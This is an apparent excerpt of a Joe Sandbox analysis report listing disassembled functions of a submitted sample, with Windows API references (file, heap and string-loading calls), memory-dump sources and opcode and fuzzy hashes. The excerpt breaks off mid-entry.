                                                                                                      • Opcode Fuzzy Hash: fb86ed7fa56956634c4f8f6c8e983ee4b42a841e1f9390439773f77019df2937
                                                                                                      • Instruction Fuzzy Hash: 4401257264021DFBCF129F94DD05DEE7F72EF08760F004124FE0966160CA369A72AB80
                                                                                                      APIs
                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00A1709A), ref: 00A179F2
                                                                                                      Strings
                                                                                                      • InitializeCriticalSectionEx, xrefs: 00A179C2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CountCriticalInitializeSectionSpin
                                                                                                      • String ID: InitializeCriticalSectionEx
                                                                                                      • API String ID: 2593887523-3084827643
                                                                                                      • Opcode ID: 491628d0d34f24d43498f8ea952ad7d58c32079e0601038356aae2f3148841c6
                                                                                                      • Instruction ID: 2f58f0241d838ba7d5a8931f5226b417a99ec7c6750a662ee010e0189a84470c
                                                                                                      • Opcode Fuzzy Hash: 491628d0d34f24d43498f8ea952ad7d58c32079e0601038356aae2f3148841c6
                                                                                                      • Instruction Fuzzy Hash: 0EF0B472645218BBCF11AF98EC06CAE7F71EB04720B504134FC156A161DE728E6297C0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Alloc
                                                                                                      • String ID: FlsAlloc
                                                                                                      • API String ID: 2773662609-671089009
                                                                                                      • Opcode ID: 43718e7a07f509a5a50c7940adb5f8a2d7fa0bd14443bf302fc89029c7a7ce1e
                                                                                                      • Instruction ID: b24a9d1f51a42f137c0f78cb848d523d9fce8c8341a19c43428e38cc9cdeef62
                                                                                                      • Opcode Fuzzy Hash: 43718e7a07f509a5a50c7940adb5f8a2d7fa0bd14443bf302fc89029c7a7ce1e
                                                                                                      • Instruction Fuzzy Hash: CEE05C71B45228778714EFA8AC05DBD7BB0DB44B20B000134FC0062241DD700E4282C5
                                                                                                      APIs
                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00A11DAF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: try_get_function
                                                                                                      • String ID: FlsAlloc
                                                                                                      • API String ID: 2742660187-671089009
                                                                                                      • Opcode ID: 04d64f698a52f9fd942711d1d4202f2aa601e023a0c2b3e241f092d375d70861
                                                                                                      • Instruction ID: 0e10ba2f981f23079ff6356ef4ce89de18e78be1a38d96dfdbdd97e7c0ca4cc2
                                                                                                      • Opcode Fuzzy Hash: 04d64f698a52f9fd942711d1d4202f2aa601e023a0c2b3e241f092d375d70861
                                                                                                      • Instruction Fuzzy Hash: 1FD05B26F8233C76D51477D9BC02AEA7E649B00FF1F040471FF08651869591445155D1
                                                                                                      APIs
                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A0CD6E
                                                                                                        • Part of subcall function 00A0CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0CB39
                                                                                                        • Part of subcall function 00A0CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0CB4A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                      • String ID: 3Ro
                                                                                                      • API String ID: 1269201914-1492261280
                                                                                                      • Opcode ID: dd9c0664d39f2a893c4b3e3819c470bef9daf91035075e0dde53e68f81e5c19e
                                                                                                      • Instruction ID: 3775c6a0907f5c3118843d1f78629868522375a8eca3061698057ce1f092d347
                                                                                                      • Opcode Fuzzy Hash: dd9c0664d39f2a893c4b3e3819c470bef9daf91035075e0dde53e68f81e5c19e
                                                                                                      • Instruction Fuzzy Hash: 7BB0929125A019BEE12493087A02C370118C590FB0320867AB40198082A84448028032
                                                                                                      APIs
                                                                                                        • Part of subcall function 00A181EB: GetOEMCP.KERNEL32(00000000,?,?,00A18474,?), ref: 00A18216
                                                                                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00A184B9,?,00000000), ref: 00A1868C
                                                                                                      • GetCPInfo.KERNEL32(00000000,00A184B9,?,?,?,00A184B9,?,00000000), ref: 00A1869F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CodeInfoPageValid
                                                                                                      • String ID:
                                                                                                      • API String ID: 546120528-0
                                                                                                      • Opcode ID: 9b04511639870113a4c8cbed1f14824b00d6c89a3c302de51f8a51b1a317e177
                                                                                                      • Instruction ID: a34f0725af7431b975d9b98284a395c68c52e2dd668ef0087e32cb7b9ff83193
                                                                                                      • Opcode Fuzzy Hash: 9b04511639870113a4c8cbed1f14824b00d6c89a3c302de51f8a51b1a317e177
                                                                                                      • Instruction Fuzzy Hash: 465134759002459FDB21CF75C881AFABBF5EF41310F28846EE0968B291DE3D99C2CB90
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 009F1383
                                                                                                        • Part of subcall function 009F5FB1: __EH_prolog.LIBCMT ref: 009F5FB6
                                                                                                        • Part of subcall function 009FC413: __EH_prolog.LIBCMT ref: 009FC418
                                                                                                        • Part of subcall function 009FC413: new.LIBCMT ref: 009FC45B
                                                                                                        • Part of subcall function 009FC413: new.LIBCMT ref: 009FC47F
                                                                                                      • new.LIBCMT ref: 009F13FB
                                                                                                        • Part of subcall function 009FAC66: __EH_prolog.LIBCMT ref: 009FAC6B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog
                                                                                                      • String ID:
                                                                                                      • API String ID: 3519838083-0
                                                                                                      • Opcode ID: cdb292097e213f7991ae7fa1e65cf8a581bf2fe04f3a50fb676c696c25cc1a06
                                                                                                      • Instruction ID: aee624d6e0dae80471b324d62d0749e75fb0c88dcedde495cba7949d1f48094b
                                                                                                      • Opcode Fuzzy Hash: cdb292097e213f7991ae7fa1e65cf8a581bf2fe04f3a50fb676c696c25cc1a06
                                                                                                      • Instruction Fuzzy Hash: 604146B0805B48DED725DF798485AE6FBE5FF28300F504A2ED6EE87282CB326554CB51
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 009F1383
                                                                                                        • Part of subcall function 009F5FB1: __EH_prolog.LIBCMT ref: 009F5FB6
                                                                                                        • Part of subcall function 009FC413: __EH_prolog.LIBCMT ref: 009FC418
                                                                                                        • Part of subcall function 009FC413: new.LIBCMT ref: 009FC45B
                                                                                                        • Part of subcall function 009FC413: new.LIBCMT ref: 009FC47F
                                                                                                      • new.LIBCMT ref: 009F13FB
                                                                                                        • Part of subcall function 009FAC66: __EH_prolog.LIBCMT ref: 009FAC6B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog
                                                                                                      • String ID:
                                                                                                      • API String ID: 3519838083-0
                                                                                                      • Opcode ID: 4168b20f8dd11e9d20b0e09a46b07b0b0e2b1987be7ca9022fd1dc23a7c8e34a
                                                                                                      • Instruction ID: 66d522f160a78337d02d1ce090c5b4bc56617d172cfdbcb99e38c1cd867152d2
                                                                                                      • Opcode Fuzzy Hash: 4168b20f8dd11e9d20b0e09a46b07b0b0e2b1987be7ca9022fd1dc23a7c8e34a
                                                                                                      • Instruction Fuzzy Hash: 774134B0805B44DED725DFB98485AE6FBE5FF28300F504A2ED6EE87282CB326554CB51
                                                                                                      APIs
                                                                                                        • Part of subcall function 00A1631F: GetLastError.KERNEL32(?,00A2CBE8,00A12674,00A2CBE8,?,?,00A12213,?,?,00A2CBE8), ref: 00A16323
                                                                                                        • Part of subcall function 00A1631F: _free.LIBCMT ref: 00A16356
                                                                                                        • Part of subcall function 00A1631F: SetLastError.KERNEL32(00000000,?,00A2CBE8), ref: 00A16397
                                                                                                        • Part of subcall function 00A1631F: _abort.LIBCMT ref: 00A1639D
                                                                                                        • Part of subcall function 00A18576: _abort.LIBCMT ref: 00A185A8
                                                                                                        • Part of subcall function 00A18576: _free.LIBCMT ref: 00A185DC
                                                                                                        • Part of subcall function 00A181EB: GetOEMCP.KERNEL32(00000000,?,?,00A18474,?), ref: 00A18216
                                                                                                      • _free.LIBCMT ref: 00A184CF
                                                                                                      • _free.LIBCMT ref: 00A18505
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorLast_abort
                                                                                                      • String ID:
                                                                                                      • API String ID: 2991157371-0
                                                                                                      • Opcode ID: 98dde61d0c270a0e5e6ae4448517aa02505db3bff5ed1dc4eb20c9a6aa1f73cf
                                                                                                      • Instruction ID: 06cc5070c6959f395167cd17d32785a73e62b860ddebfa11e05e5abcc4ab58eb
                                                                                                      • Opcode Fuzzy Hash: 98dde61d0c270a0e5e6ae4448517aa02505db3bff5ed1dc4eb20c9a6aa1f73cf
                                                                                                      • Instruction Fuzzy Hash: 5131A031904209EFDB20EFA9D541AEDBBF5EF41360F254199E8049B292EF399EC1CB51
                                                                                                      APIs
                                                                                                      • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,009F9B87,?,?,009F7735), ref: 009F9579
                                                                                                      • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,009F9B87,?,?,009F7735), ref: 009F95AE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: 8645e861b2bb4ce508307257a29d7daed3e618665d8dc1c720cd67806c7eda0a
                                                                                                      • Instruction ID: 29701b2cd6b2a62c7c4cd32f599384db5e5319ee39df8a9d92621e706a7154d9
                                                                                                      • Opcode Fuzzy Hash: 8645e861b2bb4ce508307257a29d7daed3e618665d8dc1c720cd67806c7eda0a
                                                                                                      • Instruction Fuzzy Hash: 9321E1B100474CAFE7318F54C885BB7B7ECEB49368F004A2DFAE6821D1C274AD498B61
                                                                                                      APIs
                                                                                                      • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,009F7436,?,?,?), ref: 009F9A2C
                                                                                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 009F9ADC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$BuffersFlushTime
                                                                                                      • String ID:
                                                                                                      • API String ID: 1392018926-0
                                                                                                      • Opcode ID: dafb576e79f23c5f7f72326c0e231ed5a2368562d903083b6aa0dd8bf231776b
                                                                                                      • Instruction ID: 6e6dd3792a2de89864add85f75f8fe59b0f988bad49057e818b93fd0dec6930a
                                                                                                      • Opcode Fuzzy Hash: dafb576e79f23c5f7f72326c0e231ed5a2368562d903083b6aa0dd8bf231776b
                                                                                                      • Instruction Fuzzy Hash: 3221E231258389AFC715DF28C891FBABBD8AF96708F48091DB9D1C7191D729ED08C761
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00A17795
                                                                                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A177A2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 2279764990-0
                                                                                                      • Opcode ID: 95bb37d609b214bd5f772db23d72b1b2c514fe0f9f7c09a2a7e4c918231cbf7d
                                                                                                      • Instruction ID: c4286874530e0e262cdafceb00fd5282634a3f6c9c0231b2c694f21f2a29d528
                                                                                                      • Opcode Fuzzy Hash: 95bb37d609b214bd5f772db23d72b1b2c514fe0f9f7c09a2a7e4c918231cbf7d
                                                                                                      • Instruction Fuzzy Hash: 1F11A337A042219B9B32DF6CEC809EE73B6AB84770F161220FD15AB2D4D631DCC286D1
                                                                                                      APIs
                                                                                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 009F9B21
                                                                                                      • GetLastError.KERNEL32 ref: 009F9B2D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 2976181284-0
                                                                                                      • Opcode ID: e1f59bf185fd8bc32ba8ad4c24607de662ec56513c3ac4364b2f15cac09e5695
                                                                                                      • Instruction ID: ae4f92ce741fd36fba71065c17f3e1ac134cc03874208789335475fbf2031ee5
                                                                                                      • Opcode Fuzzy Hash: e1f59bf185fd8bc32ba8ad4c24607de662ec56513c3ac4364b2f15cac09e5695
                                                                                                      • Instruction Fuzzy Hash: 1A019E717053086BEB349F29EC44B7AB7DEAB84326F14493EB252C7680CA35D8088721
                                                                                                      APIs
                                                                                                      • SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 009F98EB
                                                                                                      • GetLastError.KERNEL32 ref: 009F98F8
                                                                                                        • Part of subcall function 009F96AA: __EH_prolog.LIBCMT ref: 009F96AF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileH_prologLastPointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 4236474358-0
                                                                                                      • Opcode ID: ad7030d604febdfc7c85e6d669b074113d2b88850355c1fc091ddaf28e4a1869
                                                                                                      • Instruction ID: 93b5e3458d6fd5a2d0531a1d3fcb4b3247672811a69285d677fcb940e31fbc97
                                                                                                      • Opcode Fuzzy Hash: ad7030d604febdfc7c85e6d669b074113d2b88850355c1fc091ddaf28e4a1869
                                                                                                      • Instruction Fuzzy Hash: CA01B13260020D9B8B188F6A9C44BBA776DBF82370715462EEA36CB2A1D771DC428760
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 00A15B0B
                                                                                                        • Part of subcall function 00A159FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A123AA,?,0000015D,?,?,?,?,00A12F29,000000FF,00000000,?,?), ref: 00A15A2E
                                                                                                      • HeapReAlloc.KERNEL32(00000000,?,00200000,?,?,00A2CBE8,009F17A1,?,?,?,?,00000000,?,009F1378,?,?), ref: 00A15B47
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocAllocate_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 2447670028-0
                                                                                                      • Opcode ID: b1bbd20ccae95eea6ae492f54d1ffcfe86677b70d41c611eca677d8864c1166e
                                                                                                      • Instruction ID: 53150c479fe57621d3aec4ece496bd71bf48f326f06395c8b5e89a5075f2ba46
                                                                                                      • Opcode Fuzzy Hash: b1bbd20ccae95eea6ae492f54d1ffcfe86677b70d41c611eca677d8864c1166e
                                                                                                      • Instruction Fuzzy Hash: BBF06831E1D915EADB312F75ED01FEA376D9FC17B0B144115F8185A1A1FA30D8C191B1
                                                                                                      APIs
                                                                                                      • LoadStringW.USER32(?,?,00000200,?), ref: 009FD187
                                                                                                      • LoadStringW.USER32(?,?,00000200,?), ref: 009FD19D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LoadString
                                                                                                      • String ID:
                                                                                                      • API String ID: 2948472770-0
                                                                                                      • Opcode ID: 95abec2cfd9a6bcc0025884cb44875690d41ec0318e61ba36100a227a1495cb1
                                                                                                      • Instruction ID: aae7dabe71dbaea42e5b2cf6f3ffd8a088949340fd796ae143fd3b4275bec10d
                                                                                                      • Opcode Fuzzy Hash: 95abec2cfd9a6bcc0025884cb44875690d41ec0318e61ba36100a227a1495cb1
                                                                                                      • Instruction Fuzzy Hash: 06F0C272B0122C6BEA24DF98AC45F7B7A5EEF157A0F010435FA8497061D6214C4387E0
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(?,?), ref: 009FFCB3
                                                                                                      • GetProcessAffinityMask.KERNEL32(00000000), ref: 009FFCBA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$AffinityCurrentMask
                                                                                                      • String ID:
                                                                                                      • API String ID: 1231390398-0
                                                                                                      • Opcode ID: 6fdaf5310a74109ed3034cb8740470d2ecae4c4bbfa459b2bfd9f4274e52fe6b
                                                                                                      • Instruction ID: bef29c70344b50c716d0e88de419c729567383be1ab677406f3bded68d23e2a4
